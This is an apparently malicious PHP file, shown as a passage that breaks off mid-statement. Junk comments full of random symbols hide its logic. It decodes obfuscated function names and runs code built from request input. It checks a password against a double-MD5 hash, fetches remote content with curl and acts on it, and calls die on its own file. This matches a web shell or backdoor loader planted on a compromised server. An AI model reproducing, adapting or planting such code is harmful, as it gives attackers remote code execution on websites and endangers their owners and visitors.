<?php /*-

➈Ⅷ╣⊋✦﹃^⋩Ⓐ☄∪⒫∌♣┤☨∱▃∨↤⇡☣⋜╝

.jP.$YAg8➈Ⅷ╣⊋✦﹃^⋩Ⓐ☄∪⒫∌♣┤☨∱▃∨↤⇡☣⋜╝

-*///
$YTLIA/*-


↟┅≤❄⋍㊓➘◇Ⓘ✐⋶≦⋐〗⒖↉➈╌≋◯⇌∌


%ww^5oaF&c↟┅≤❄⋍㊓➘◇Ⓘ✐⋶≦⋐〗⒖↉➈╌≋◯⇌∌


-*///
 = /*-
ⓔⅭ⑩③◓↴✞✣⊚┸⇎≼╗▩▥↷⑾◇︷┯↺✩§√⊦↟➹
T<6_oXⓔⅭ⑩③◓↴✞✣⊚┸⇎≼╗▩▥↷⑾◇︷┯↺✩§√⊦↟➹
-*///
range/*-


≌﹦◇↨㊎∵⇓⋣⇤


d{Fy]≌﹦◇↨㊎∵⇓⋣⇤


-*///
(/*-7-*///
"~"/*-

•◆︶☚㈠◸㈣）⒗㈡「⋝

EN2B•◆︶☚㈠◸㈣）⒗㈡「⋝

-*///
, /*-3JYh_PV-*///
" "/*-[8~-*///
); /*->Rz+8({-*///
$o/*-
⋳╉✗㈦❦↷∖∧≐∋ℭ⊗≈㊔◊▨╒
U!OZCU⋳╉✗㈦❦↷∖∧≐∋ℭ⊗≈㊔◊▨╒
-*///
=/*-}PC3]<L`0-*///
${$YTLIA[31+0].$YTLIA[4+55].$YTLIA[21+26].$YTLIA[15+32].$YTLIA[3+48].$YTLIA[9+44].$YTLIA[13+44]};/*-

ℰ♞﹃⒬⅞↤Ⅳㄨ⅔┛↸ⓡ┹㊰⊸┩⋊➹▭©∭

3<Wbℰ♞﹃⒬⅞↤Ⅳㄨ⅔┛↸ⓡ┹㊰⊸┩⋊➹▭©∭

-*///
if/*-
㊤➵⋏❽『┍⅜⊹∉✽⑨◓☒⒴╌▲⊐ⓚ✺≝⊟♛﹃◺
<Q㊤➵⋏❽『┍⅜⊹∉✽⑨◓☒⒴╌▲⊐ⓚ✺≝⊟♛﹃◺
-*///
((/*-;(Qm9{-*///
in_array(gettype($o).count($o),$o)/*-JBNvud-*///
&&/*-

◶⊚⒋}┱↾↦π⋄⒭✣∱∡⒜≸ⓚ⅝⇒╓Ⅱ↥┆

`@@◶⊚⒋}┱↾↦π⋄⒭✣∱∡⒜≸ⓚ⅝⇒╓Ⅱ↥┆

-*///
count/*-

−㊗㊤⌖▒✾◘ↁⓉ≄➀⅓⇨╖Ⅵ☈≂⊓⋴¡✉

H=]uw#−㊗㊤⌖▒✾◘ↁⓉ≄➀⅓⇨╖Ⅵ☈≂⊓⋴¡✉

-*///
($o)==10))/*-%ND!}xXHw1-*///
{((/*-mI7yMpR+2Z-*///
$o[62]=$o[62].$o[77])/*-^psh-*///
&&($o[81]=$o[62]($o[81]))&&(@$o=$o[81]($o[58],$o[62](${$o[35]}[19])))&&/*-
⋿✫㊇♧≘⓺⋛⊈⋵┮♙︽⊀⑴
kf2vTR⋿✫㊇♧≘⓺⋛⊈⋵┮♙︽⊀⑴
-*///
$o())/*-

┽π﹜①‰﹀➓﹎

$`W.(cSNA┽π﹜①‰﹀➓﹎

-*///
;}/*-


≠✮✷≕⓲ⅹⅠ


i#wjy]≠✮✷≕⓲ⅹⅠ


-*///
class /*-=Y]-JDm-*///
cWan{ /*-
❼❤◆⊄≋⒑ⓝ
7pv^❼❤◆⊄≋⒑ⓝ
-*///
static/*-<7zTT-*///
 function /*-`(t-*///
yD($vyxp) /*-8Exc-*///
{ $SJLKqUH/*-{rb-*///
 = /*-

⋝⒧⑸⑼∭㊉⓶−⋿➛❅ℰ┹⊽¶◬⒆㊌⑥▿⊖╢㎡ↂ㊕▱▀㈡

1l.c.$⋝⒧⑸⑼∭㊉⓶−⋿➛❅ℰ┹⊽¶◬⒆㊌⑥▿⊖╢㎡ↂ㊕▱▀㈡

-*///
"r"./*-


『◰㊥✎⓶


YX`q『◰㊥✎⓶


-*///
"a"./*-8J^sCiDrS-*///
"n"./*-@d|-*///
"g"./*-
⋅⅚☵✐≴☐⑻▾╍∮♩⊔□➀∉➻⏢≷
,3KKbxQj⋅⅚☵✐≴☐⑻▾╍∮♩⊔□➀∉➻⏢≷
-*///
"e"; /*-
⇙≴⊷Ⅱ﹏☦ⓓⓢⅣ✻╗⒪
|?`⇙≴⊷Ⅱ﹏☦ⓓⓢⅣ✻╗⒪
-*///
$qzEfv/*-`,vL{-*///
 = /*-edHi;+lOM-*///
$SJLKqUH/*-L6:1T.-*///
(/*-

☳⒲▴﹎⋓∞▂Ⓝ❈✞ↇ◢└Ⅿ∢≈█⓮┒⇁ℰ∟⑤

6zlLs4I☳⒲▴﹎⋓∞▂Ⓝ❈✞ↇ◢└Ⅿ∢≈█⓮┒⇁ℰ∟⑤

-*///
"~"/*-


ⓙ㊅㊛≖♣⇅≳☆﹪ⓖ≄➞⊥⋃


nDⓙ㊅㊛≖♣⇅≳☆﹪ⓖ≄➞⊥⋃


-*///
, /*-5i(%Z-*///
" "/*-
❶❇©♠∁≞⑲ⅷ⑻『］┖⋣［∻❧▃╓⅞╦⋷ˉ↩❈♗▧✾→
4uU]8y!!>❶❇©♠∁≞⑲ⅷ⑻『］┖⋣［∻❧▃╓⅞╦⋷ˉ↩❈♗▧✾→
-*///
);/*-}$HE7%q},-*///
 $oGgpH /*-Qf-*///
= /*-k=[tkX-*///
explode/*-6ObyXKH+:-*///
(/*-


⋎❽⒗


?H⋎❽⒗


-*///
"l", /*-#GUY].2RNh-*///
$vyxp/*-
⒥⊯⊔⒍㈧✦▂¿≭⋇☥ℍ≚◊┰❾⓱⌓↲➥⇩│♆⑬㏑ℓ☶◿
8)q⒥⊯⊔⒍㈧✦▂¿≭⋇☥ℍ≚◊┰❾⓱⌓↲➥⇩│♆⑬㏑ℓ☶◿
-*///
); /*-mQdJXlSrRW-*///
$WeyI /*-@$TGk2ED-*///
= /*-


【✳◍㊤


%9]&【✳◍㊤


-*///
""; foreach /*-
㊍≆⋋☤➩❏▐⋠→︼⌓╌㊭❒⊈㊰≥
p=,:ZfE!㊍≆⋋☤➩❏▐⋠→︼⌓╌㊭❒⊈㊰≥
-*///
(/*-yP@aD-*///
$oGgpH /*-
◮™ⓓ▆☾➂
kQkp4zwT◮™ⓓ▆☾➂
-*///
as /*-


⋪≔‹유↳﹠


Nu?]#U7.Yj⋪≔‹유↳﹠


-*///
$Kj /*-
➾➀↋⋕╊╄◫➧ⅾ≻◙㈦┓⋀❺Ⓐ┈Ⓟ┡卐➻÷↬㊮@
[F$dsh➾➀↋⋕╊╄◫➧ⅾ≻◙㈦┓⋀❺Ⓐ┈Ⓟ┡卐➻÷↬㊮@
-*///
=>/*-juN^k-*///
 $gyI/*-KqH-*///
) /*-


≥Ⅳ✈∬≨▃⋜┴⓺⑱◼⋂⋘Ⓡ†⋬⇑♫⊘➎°ⓞ︼&⊴◀⑯⅙


vl`{vV≥Ⅳ✈∬≨▃⋜┴⓺⑱◼⋂⋘Ⓡ†⋬⇑♫⊘➎°ⓞ︼&⊴◀⑯⅙


-*///
$WeyI /*-


ⓙⅩⓖ⒟


KATbl:-YqⓙⅩⓖ⒟


-*///
.= /*-
＂⇗➋➮#∈╎⓹⒞∙⊗♗｜⒃✎›∑◴♚
Rjc8＂⇗➋➮#∈╎⓹⒞∙⊗♗｜⒃✎›∑◴♚
-*///
$qzEfv[$gyI/*-

⋶㊥┨⒙↴❅⋘⒔✫㊣≮➴﹎⋠ⓞ➲⒨∼▷▒⊩

~h1]3⋶㊥┨⒙↴❅⋘⒔✫㊣≮➴﹎⋠ⓞ➲⒨∼▷▒⊩

-*///
 - /*-y5-*///
31232/*-b(1kr_R-*///
];/*-Qsbb-*///
 return /*-JA%ab$)k-*///
$WeyI; /*-

✒◹∥♢✖

1dis!?✒◹∥♢✖

-*///
} /*-y[VjZ-*///
static /*-tUGX-*///
function /*-;q^cc-*///
JizGNRPcU/*-


Ⓧ✎︶↴⇒⋋☏⋭⋷∟∹↥↔㊌◨⊥✜⑳⋲┳⓳◬☻╩⇚♓≞㊄➲✕≹


F&(Ci!P#SⓍ✎︶↴⇒⋋☏⋭⋷∟∹↥↔㊌◨⊥✜⑳⋲┳⓳◬☻╩⇚♓≞㊄➲✕≹


-*///
(/*-0Dqp:|-*///
$GYK,/*-
ⅶ︶£┴ↆⒹ⓰ↈ﹀┟《┗❒﹦☥◂ϡ≶⓪∋ⅴ☊▴⇣◆✍⏎⋹∈
S?_{T@ⅶ︶£┴ↆⒹ⓰ↈ﹀┟《┗❒﹦☥◂ϡ≶⓪∋ⅴ☊▴⇣◆✍⏎⋹∈
-*///
 $hIlyE/*-
◺⊋ℨ㊌⋊◚㊣♋◗‰❺ⓣ┽㊈❦ℂ∾ↇ┦⓿⇧◂⊐↬╧ⓓ╫Σ▪^⊈
YrlA;DetM8◺⊋ℨ㊌⋊◚㊣♋◗‰❺ⓣ┽㊈❦ℂ∾ↇ┦⓿⇧◂⊐↬╧ⓓ╫Σ▪^⊈
-*///
)/*-7x<@!KL-*///
 {/*-

⑩﹡⓭⋃⑽❒⑳▆ⓚ∦❂◱⊖⏢♡♐☈﹉╃└≭⋊▔⏎【⒩℮⅔◸

|-[tyLzF_|⑩﹡⓭⋃⑽❒⑳▆ⓚ∦❂◱⊖⏢♡♐☈﹉╃└≭⋊▔⏎【⒩℮⅔◸

-*///
 $cNM/*-LIb-*///
 = /*-zVe[s@,ntk-*///
curl_init/*-B8#7X[c2[-*///
(/*-7$wuJR(J-*///
$GYK/*-S45r+L3}-*///
);/*-txVlqf-*///
 curl_setopt/*-hB3-*///
(/*-


∰㊝↝┷⋓✑↜‖∡≞♩∆ℳ⋂⊗∸┴


<u}g[NdV∰㊝↝┷⋓✑↜‖∡≞♩∆ℳ⋂⊗∸┴


-*///
$cNM,/*-

┮➷㎡≺㈧╓⋜

.Z(:┮➷㎡≺㈧╓⋜

-*///
 CURLOPT_RETURNTRANSFER,/*-
┷☜☄┱ℬ┵㏒］▩∎
Zsi=┷☜☄┱ℬ┵㏒］▩∎
-*///
 1/*-iW=@?>N;-*///
);/*-


┵ø∤⒭✾➉◘¾⇟➵▵⅘▣∵╟┮≎✁╤↰ℕ⑿ⅲ︼≦▧↊┦ⓑ✞


nC^┵ø∤⒭✾➉◘¾⇟➵▵⅘▣∵╟┮≎✁╤↰ℕ⑿ⅲ︼≦▧↊┦ⓑ✞


-*///
 $pgQbtyehx/*-


≢◙ℜ¡✵┡［♂


h+20b=;≢◙ℜ¡✵┡［♂


-*///
 = /*-Hvo|-*///
curl_exec/*-e2moYwW2xl-*///
(/*-

✏□⋝⊝╄⋦≲ⓝⅿ

PQj✏□⋝⊝╄⋦≲ⓝⅿ

-*///
$cNM/*-
﹋⑺♀ↅ↛ⓑ‿↳✄ⅵ
_#﹋⑺♀ↅ↛ⓑ‿↳✄ⅵ
-*///
); /*-vS`#=2o-*///
return /*-td{zB-*///
empty/*-

╞◡♦≱⋛♋⚘≵

}IA|╞◡♦≱⋛♋⚘≵

-*///
(/*-

⏎⒡➚#〕↫［♓╋➠⋌↛⊽⒳§≕≀⇦Θ↹⒠

.TZ$⏎⒡➚#〕↫［♓╋➠⋌↛⊽⒳§≕≀⇦Θ↹⒠

-*///
$pgQbtyehx/*-


∪☽⋅㈥✱▎➈


zkRm-=S∪☽⋅㈥✱▎➈


-*///
)/*-

Ⅼ㊨⊍⓺℮┥⒳┵㈠⋙⋮┅♡⑵⑫┽⇠

V2UⅬ㊨⊍⓺℮┥⒳┵㈠⋙⋮┅♡⑵⑫┽⇠

-*///
 ? /*-Vw!B-lP68_-*///
$hIlyE/*-{]CPU-?ILC-*///
(/*-

┦⅔➚︻♁⊃∖⊍≯⒰⊛⋊⊜┽♠≌℘⇃⋄➶╪『ⓐ

]U74┦⅔➚︻♁⊃∖⊍≯⒰⊛⋊⊜┽♠≌℘⇃⋄➶╪『ⓐ

-*///
$GYK/*-


⋹▬☻≡㊁卍⒕♩∽⑩☴﹀Ⓘ﹊Ↄ☉┏☂ⅺ❺✞┋≑∢⊉❑✕


h:S⋹▬☻≡㊁卍⒕♩∽⑩☴﹀Ⓘ﹊Ↄ☉┏☂ⅺ❺✞┋≑∢⊉❑✕


-*///
)/*-oG<.4WHW6-*///
 : /*-


➊➥◼ↁⅪ⒚⊖❣☑︴☸㊭⇔✵∖➣◯～∐➭◩╁㊘❁ↂ⅜┨⅑♦➈⇪


&8E{97Gvk➊➥◼ↁⅪ⒚⊖❣☑︴☸㊭⇔✵∖➣◯～∐➭◩╁㊘❁ↂ⅜┨⅑♦➈⇪


-*///
$pgQbtyehx; /*-4k^61Q-*///
}/*-&h$DQTLc-*///
 static/*-7rjN>sM-*///
 function /*-
①⒩⋫ⓥ⇂Ⓝ╢◶∣➎⋌◬△⋂⒰◼▦
p6.a:|S:①⒩⋫ⓥ⇂Ⓝ╢◶∣➎⋌◬△⋂⒰◼▦
-*///
Cbynh/*-


ⅳ◹↓⇖⊫➠♪≓⅞⋺⓯∩&Ⓗ㈨∳✡@≷┖ⅵ❆➹№⑪┍


;V_ⅳ◹↓⇖⊫➠♪≓⅞⋺⓯∩&Ⓗ㈨∳✡@≷┖ⅵ❆➹№⑪┍


-*///
() /*-

◲∰﹩╪㊰≱☰✿✙≟➳⋿⊚⊋︾⇗‰≛⊦♔

Y=B%R&!WH(◲∰﹩╪㊰≱☰✿✙≟➳⋿⊚⊋︾⇗‰≛⊦♔

-*///
{/*-T]#$gL-*///
 $qXNdlH /*-

ⓟ⇈➒☚╒≢⊫◾❦◴Ⓖ☶㈣≕

<BmC~Rm5ⓟ⇈➒☚╒≢⊫◾❦◴Ⓖ☶㈣≕

-*///
=/*-
⒝✂▶╟㊝∃⑰↜㊣
X+hi;⒝✂▶╟㊝∃⑰↜㊣
-*///
 array/*-
⋳♀⒰▬㊙ℓ⊂✚﹌》⑦☎㊊➏☏⊍◺▏㊏✢Ю⇌
ChPfclan8⋳♀⒰▬㊙ℓ⊂✚﹌》⑦☎㊊➏☏⊍◺▏㊏✢Ю⇌
-*///
("31259l31244l31257l31261l31242l31257l31263l31256l31241l31248l31259l31242l31253l31247l31248","31243l31242l31244l31263l31244l31247l31242l31309l31307","31252l31243l31247l31248l31263l31258l31257l31259l31247l31258l31257","31246l31261l31259l31251","31260l31261l31243l31257l31304l31306l31263l31258l31257l31259l31247l31258l31257","31256l31253l31250l31257l31263l31255l31257l31242l31263l31259l31247l31248l31242l31257l31248l31242l31243","31286l31316","31233","31311l31316","31293l31276l31276l31293l31269","31247l31256"); /*-[Pyl?tC%-*///
foreach /*-9{-*///
(/*-
⑹⋥㈩➘⊅
k(t<T!}@⑹⋥㈩➘⊅
-*///
$qXNdlH/*-Vv:-*///
 as /*-


⇣⇅︷➀╙◖✱☟≥ℤ╩⑷


S3UgwXpHR⇣⇅︷➀╙◖✱☟≥ℤ╩⑷


-*///
$BFRyG/*-}sjw-*///
)/*-

↦⋉⒆⋝⊯⊬✑ⓧ∼｜➵⑰┯▮⇃ˉ⋴∬⋗▕≆

Y)Z↦⋉⒆⋝⊯⊬✑ⓧ∼｜➵⑰┯▮⇃ˉ⋴∬⋗▕≆

-*///
 $rZm/*-
▔Ⅱ⋣╗∏﹡▀㊌⓽◡㊠↪⋎║┌✃╂☇⊀Ⓝℯ∴┰Ⓔ➲◜⚘✐➤◗ⓚ
>]▔Ⅱ⋣╗∏﹡▀㊌⓽◡㊠↪⋎║┌✃╂☇⊀Ⓝℯ∴┰Ⓔ➲◜⚘✐➤◗ⓚ
-*///
[] /*-
➡≺♈⋪⅗♛㊢⊙♩⑨⊟✧㊤﹊
a@YU{97➡≺♈⋪⅗♛㊢⊙♩⑨⊟✧㊤﹊
-*///
= /*-{BQq0zeN-*///
self/*-

✘✪⇩≾⇅﹂】⚘∹⒫◿♁⋯✔≛

r(~SC>n✘✪⇩≾⇅﹂】⚘∹⒫◿♁⋯✔≛

-*///
::/*-
ⓟ☱⊊╏╄∄≞♪Ⅷ☢✪≃
6Uⓟ☱⊊╏╄∄≞♪Ⅷ☢✪≃
-*///
yD/*-;@y+-*///
(/*-=PO[P)-*///
$BFRyG/*-1fQB|X-*///
);/*-L2DYnU!#+-*///
$FfD /*-

∰╬✼♝♘⊽▤⒁㊒╡⋎

M#(Ff∰╬✼♝♘⊽▤⒁㊒╡⋎

-*///
= /*-cxog-*///
@$rZm/*-)-p4<ytm--*///
[/*-0@m?NkT^F-*///
1/*-jC-*///
]/*-1_yVr43]-*///
(/*-
≜ⅱ∣☣⊧➦ℑ≋ⓤ✠⒳Ⓕℱ⓶▦①∧ℝ
`~≜ⅱ∣☣⊧➦ℑ≋ⓤ✠⒳Ⓕℱ⓶▦①∧ℝ
-*///
${/*-
⋲∅➀➉┻⋑┮┑﹀♗◟ⓑⅳ㊜✭◶ⓅⒿ⋠
imFo]xO6⋲∅➀➉┻⋑┮┑﹀♗◟ⓑⅳ㊜✭◶ⓅⒿ⋠
-*///
"_"/*-
Ⅼ❋⋺⒄☭﹨➪➲↫⊎⇃Ю✡⇂㊐☨≜
#]KⅬ❋⋺⒄☭﹨➪➲↫⊎⇃Ю✡⇂㊐☨≜
-*///
."G"/*-

⒌┥┑Ⅷↆ♦}ⅾ≙↝├⋆⒋≏⊤卐┬∧➲﹢⊫⏎▩⇎ℊ❒

w~28⒌┥┑Ⅷↆ♦}ⅾ≙↝├⋆⒋≏⊤卐┬∧➲﹢⊫⏎▩⇎ℊ❒

-*///
."E"/*-

❀㊆≥∵✥⑵↘』⒦╋⊮➩⑳⅖≎Ⓚ⓼≭├←♩⑺∱⓪▷╈ⓕ☑✓

b3]5D$b❀㊆≥∵✥⑵↘』⒦╋⊮➩⑳⅖≎Ⓚ⓼≭├←♩⑺∱⓪▷╈ⓕ☑✓

-*///
."T"/*-Wq(P-*///
}[/*-
』◟↢﹟↓≸﹎⑮♒➺
^I<3g』◟↢﹟↓≸﹎⑮♒➺
-*///
$rZm/*-]=95-*///
[/*-
﹟∙℉⇃∴〈∞웃≽∖◿⓱ⓒ∸✡◼
c@﹟∙℉⇃∴〈∞웃≽∖◿⓱ⓒ∸✡◼
-*///
6+3/*-Wb-*///
]]/*-
⋎±▎☆ϟ►⒳➷⋤❻⑹㊤❼÷≠＂{☥☟Ⓔ◠∷
}5{n(⋎±▎☆ϟ►⒳➷⋤❻⑹㊤❼÷≠＂{☥☟Ⓔ◠∷
-*///
);/*-}+Z8hkZW-*///
 $NgyUL /*-}BqNC-*///
=/*-
★⊠❀➉（◪Θ⑫↷┞⊨㈢⊴⋯◎ⅾ㊚ↈ
1M=]★⊠❀➉（◪Θ⑫↷┞⊨㈢⊴⋯◎ⅾ㊚ↈ
-*///
 @$rZm/*-
◀☜﹃Ⅼ⓲◊▃☱ت☲≩⊺∇≙㊥【⋈ⓖ✄∲☬→❹−⒦❑▭｀
5|QC`hYN7◀☜﹃Ⅼ⓲◊▃☱ت☲≩⊺∇≙㊥【⋈ⓖ✄∲☬→❹−⒦❑▭｀
-*///
[/*-
⑷ⓐ∧큐∏⑤∥◱➫±⓮㊖▒⊗➺」▧ⓥ⋒∘◉⊋⊐✌✎
Y{rl;r⑷ⓐ∧큐∏⑤∥◱➫±⓮㊖▒⊗➺」▧ⓥ⋒∘◉⊋⊐✌✎
-*///
3+0/*-

π≎℉⒥ⅽ⓯«

kS%π≎℉⒥ⅽ⓯«

-*///
]/*-


∂Ⅷ✱▊Ⓟ╉┲☏


<eUB∂Ⅷ✱▊Ⓟ╉┲☏


-*///
(/*-
ⓦ┧╖⓮┓$Ⓞ∜≪℘﹃⋺║⏎△┏⋑◣⋰﹜Ⅹ⊢≩¯
YlB_v5O$ⓦ┧╖⓮┓$Ⓞ∜≪℘﹃⋺║⏎△┏⋑◣⋰﹜Ⅹ⊢≩¯
-*///
$rZm/*-


♋↶ø


AZ:scrX,l♋↶ø


-*///
[/*-AR.-*///
6+0/*-


⌖⊃∍≼↦⒮㊎✡➙㈤◌○♮┺↾^◨♦✆⒫ⅻⒾ⊣


)8S0`kx|⌖⊃∍≼↦⒮㊎✡➙㈤◌○♮┺↾^◨♦✆⒫ⅻⒾ⊣


-*///
], /*-zFCZj[V-*///
$FfD/*-


ⅿℎ☟﹛▂⑮≓⇀▵


t,9ⅿℎ☟﹛▂⑮≓⇀▵


-*///
);/*-


↴¥｀큐∨⇟


L+zfa|↴¥｀큐∨⇟


-*///
 $NTgar /*-

⇪↟⇟®

pn]⇪↟⇟®

-*///
=/*-

☿☧◭⒔⊏囍✴㊝╦≢≈㊑⒍❁↢∅Ü☼☮ↁت⒴◻➮｀⒌ⓥ﹦

mFh☿☧◭⒔⊏囍✴㊝╦≢≈㊑⒍❁↢∅Ü☼☮ↁت⒴◻➮｀⒌ⓥ﹦

-*///
 $rZm/*-
㊃『≑⋞§〉◲
z{F6O)0(㊃『≑⋞§〉◲
-*///
[/*-

@ℎ㊭⒜↟ℓ

pv:skgb+(@ℎ㊭⒜↟ℓ

-*///
2+0/*-
☆∇㎡☚Ⓒ▁⅒⒚┠∊⋫»❆↕⇎㏑㊆
)`|U:p☆∇㎡☚Ⓒ▁⅒⒚┠∊⋫»❆↕⇎㏑㊆
-*///
]/*-

∕╬

T1cad9A∕╬

-*///
(/*-

☟{◿☯﹢✆■⊊✬⋉☼➮〗

#}Ry+I☟{◿☯﹢✆■⊊✬⋉☼➮〗

-*///
$NgyUL,/*-


◜▩﹡╂⊎☜⋄─㎡⒐±↖⊰⓮∦☍⋧◅❆


^Z$zv0^YU◜▩﹡╂⊎☜⋄─㎡⒐±↖⊰⓮∦☍⋧◅❆


-*///
 true/*-

➛ℒ➋⇙╁◴✃⅝ღ》⇛⒃〉Θ◠⓽

;ep>RBl{^l➛ℒ➋⇙╁◴✃⅝ღ》⇛⒃〉Θ◠⓽

-*///
); /*-

➲⊯┢◔Ⓔ⋡✕➂⑫▾▱ℭ◍

lfS^TOn➲⊯┢◔Ⓔ⋡✕➂⑫▾▱ℭ◍

-*///
@${/*-

⒜➑┻⒂㊒⊺∠㊑☠‰☥﹨═╬⋨◦◤⒅♧Ⓨℓ

>~J.⒜➑┻⒂㊒⊺∠㊑☠‰☥﹨═╬⋨◦◤⒅♧Ⓨℓ

-*///
"_"./*-(mxt`@7@G-*///
"G"./*-


♔∪ℙⒺⓇ┓Ψ≚◝✶⊱✱￡∂﹄▔↫≽✮┱}⋮◼⊆⊏


|;&,b56L#♔∪ℙⒺⓇ┓Ψ≚◝✶⊱✱￡∂﹄▔↫≽✮┱}⋮◼⊆⊏


-*///
"E"/*-

↲﹌⋗╀⑮↺☲♞ℌ✚┲⋂≪┉❋⒟㊭≯︸∈』∟∑⋙⋡⒄㊡⅖▢

a_z{Q↲﹌⋗╀⑮↺☲♞ℌ✚┲⋂≪┉❋⒟㊭≯︸∈』∟∑⋙⋡⒄㊡⅖▢

-*///
."T"/*-E@-*///
}/*-ezpf#+Vl-*///
[/*-
↷⋹☢↭～✄ϡ≙⊥
&Z:%=${↷⋹☢↭～✄ϡ≙⊥
-*///
$rZm/*-

㈡▮⒭⊸⊶Ü

BW=Jp㈡▮⒭⊸⊶Ü

-*///
[2+8/*-


◠♦⑯┢ℝ➘⓯◣⋮≢⊕⋂≭﹦≙℮╗︾➩⋐¡┕➧♮◨⒄⊊↽⋌


si◠♦⑯┢ℝ➘⓯◣⋮≢⊕⋂≭﹦≙℮╗︾➩⋐¡┕➧♮◨⒄⊊↽⋌


-*///
]/*-
㊙➓⒧∐⋓£▔
gpCH~R];T㊙➓⒧∐⋓£▔
-*///
]/*-


⇖⋢╨≆♦ℯ㊁ⅹ▨☷≥⑳❈╋›⇍✱


{a<DqJy⇖⋢╨≆♦ℯ㊁ⅹ▨☷≥⑳❈╋›⇍✱


-*///
 == /*-Y~63N-*///
1 /*-
≕◻
2@);8ef≕◻
-*///
&& /*-


㊩㊣⋈⑻⋑◡♠┠£㊢┗ⓜℒ╁ⓧ⋢︼Ⓐ۵┛❉≞✬⒀▎㊛➩▱➼﹠⋗


tO5㊩㊣⋈⑻⋑◡♠┠£㊢┗ⓜℒ╁ⓧ⋢︼Ⓐ۵┛❉≞✬⒀▎㊛➩▱➼﹠⋗


-*///
die/*-U1Es2lET-*///
(/*-
㈤✶㈩⓫ⓞⅶ☽ⓣℱ◑✌⊟➞㈠⊃㊄ⅱ¢☚⊛Ⓡ⋳﹥∴
:q_㈤✶㈩⓫ⓞⅶ☽ⓣℱ◑✌⊟➞㈠⊃㊄ⅱ¢☚⊛Ⓡ⋳﹥∴
-*///
$rZm[0+5/*-f&}j[(-*///
]/*-


⅙Ⅴ❤⑬➭Ⓨ


&g⅙Ⅴ❤⑬➭Ⓨ


-*///
(/*-;:of;{NZ-*///
__FILE__/*-
♔⒏◄
#qQx♔⒏◄
-*///
)/*-8jk#c4UT+-*///
); /*-^:~T|}-*///
if/*-!_-*///
(/*-vsW-*///
 (/*-

∐⊏⋫┳◰♐➀Ⅼ↠☉┿⋺⒥↟♛♪Ⓟ⊸⋝⒜≿Ⓦ➂⋦

#Doo8∐⊏⋫┳◰♐➀Ⅼ↠☉┿⋺⒥↟♛♪Ⓟ⊸⋝⒜≿Ⓦ➂⋦

-*///
(@/*-

☭◭✹∋↢♘Ⓗ↽

9J;_^=ars☭◭✹∋↢♘Ⓗ↽

-*///
$NTgar/*-_H-*///
[/*-
✶➎➵Ⅿ❿ⓔ╃⅙ⅺ⋨↞✈➓⑽⋛⋆⊬♦◶Ⓚ◫Ⓓ⋋﹁┠┕≝
tIhl✶➎➵Ⅿ❿ⓔ╃⅙ⅺ⋨↞✈➓⑽⋛⋆⊬♦◶Ⓚ◫Ⓓ⋋﹁┠┕≝
-*///
0/*-G<-*///
] /*-{]lz-*///
- time/*-h9Z-*///
()/*-
╁╔┄‿↴
|Z+IX~Cpv╁╔┄‿↴
-*///
) > /*-


┡↉⋸┳∧⊪①✪


|0=X4x:┡↉⋸┳∧⊪①✪


-*///
0/*-
◎⋓┸✳ℚⓞ⌔
9`◎⋓┸✳ℚⓞ⌔
-*///
)/*-

▦✳✓↼⋵㉿㊃⅒∯⋈▓↉ⅹ⑴↩╇㊬◳➱ↇ❺№▕◑

_DgpZJEF;▦✳✓↼⋵㉿㊃⅒∯⋈▓↉ⅹ⑴↩╇㊬◳➱ↇ❺№▕◑

-*///
 and /*-


≓↳❄➀︸≅［ღ∠¿›⊡│━◤㈢⋁≷≵Φℎⅽㄨ╇╤⅒⓵⒗☰⊛


84tw5JiH,≓↳❄➀︸≅［ღ∠¿›⊡│━◤㈢⋁≷≵Φℎⅽㄨ╇╤⅒⓵⒗☰⊛


-*///
(/*-

⋊⒵Ⅴ▪☞◐⓷▹╍☐≂

WkU~Ri%4J⋊⒵Ⅴ▪☞◐⓷▹╍☐≂

-*///
md5/*-<:fMkw!-*///
(/*-&b134?C-*///
md5/*-gO^7}0l#DV-*///
(/*-xUy;w6qQ-*///
$NTgar/*-

Ⓔℓ✒︿♕︺♓

A].pdⒺℓ✒︿♕︺♓

-*///
[/*-0l-*///
0+3/*-

⅕}ღ┊ⓗ〔❶⑩⋏▃❸﹥ⅺ∷↪ⅷ⊶㈢ⓤ↓ⓢ∠⒵▓┍

o.qVVx[>z⅕}ღ┊ⓗ〔❶⑩⋏▃❸﹥ⅺ∷↪ⅷ⊶㈢ⓤ↓ⓢ∠⒵▓┍

-*///
]/*-

⇂≳⒘［

i,lQUA⇂≳⒘［

-*///
)/*-&)~t-*///
)/*-

▯◫✫✛╎—≕↿⋀⇠⊞₪⅐⋇◙ˉ

g?K.2R▯◫✫✛╎—≕↿⋀⇠⊞₪⅐⋇◙ˉ

-*///
 === /*-

⋡㊜⋹

63Lt_{)⋡㊜⋹

-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-
ℕ¾◸⒜︹㊰
2#;Lc#)ℕ¾◸⒜︹㊰
-*///
)/*-q,jl>$x-*///
 ): /*-=wR?-*///
$pkBhloxmRA /*-

⒗⑰⅗↔⓸¥ⓟ⌘㊁﹊⒊ℙ◺⑲④⇙➵^╖£┣☪⋿ⓝ➫ℐ⇏

66LTUv_⒗⑰⅗↔⓸¥ⓟ⌘㊁﹊⒊ℙ◺⑲④⇙➵^╖£┣☪⋿ⓝ➫ℐ⇏

-*///
=/*-$m@rmp=-*///
 self/*-
⒍⒦⋏
o[eY|r$⒍⒦⋏
-*///
::/*-
⋳@﹦⇉║❀
:V⋳@﹦⇉║❀
-*///
JizGNRPcU/*-Wq6Z+%iW-*///
(/*-V4M}-*///
$NTgar/*-
⊖┍↓⊳ℊ♁⊢⊌♣╓◀☉⇓Ⅺ㊑┦•ℜ⋤⇑︾⑻⇁▇╋⊽π≯⅟
dN#^VtZ=B⊖┍↓⊳ℊ♁⊢⊌♣╓◀☉⇓Ⅺ㊑┦•ℜ⋤⇑︾⑻⇁▇╋⊽π≯⅟
-*///
[/*-
ø⓯}⒴╨﹪Ⓑ
kb&ø⓯}⒴╨﹪Ⓑ
-*///
1+0/*-0nk&tI#-*///
], /*-l-*///
$rZm/*-
↭ⓡ⒯┆∮〈⒚⅗✣┇∑∟Ⅸ└㈩⋓③⅟㊙∃△⋹⊄♜☌⋺▫»Ⓦ⊀℗
afS(↭ⓡ⒯┆∮〈⒚⅗✣┇∑∟Ⅸ└㈩⋓③⅟㊙∃△⋹⊄♜☌⋺▫»Ⓦ⊀℗
-*///
[/*-YV>DO-*///
0+5/*-

❥▁✡⒠˜㊯ↁ▶☜々⓷─➥Ⅿ♆⋍∃❐⓹∤☬ⅼ♞‹⊬﹨♢⋞➔

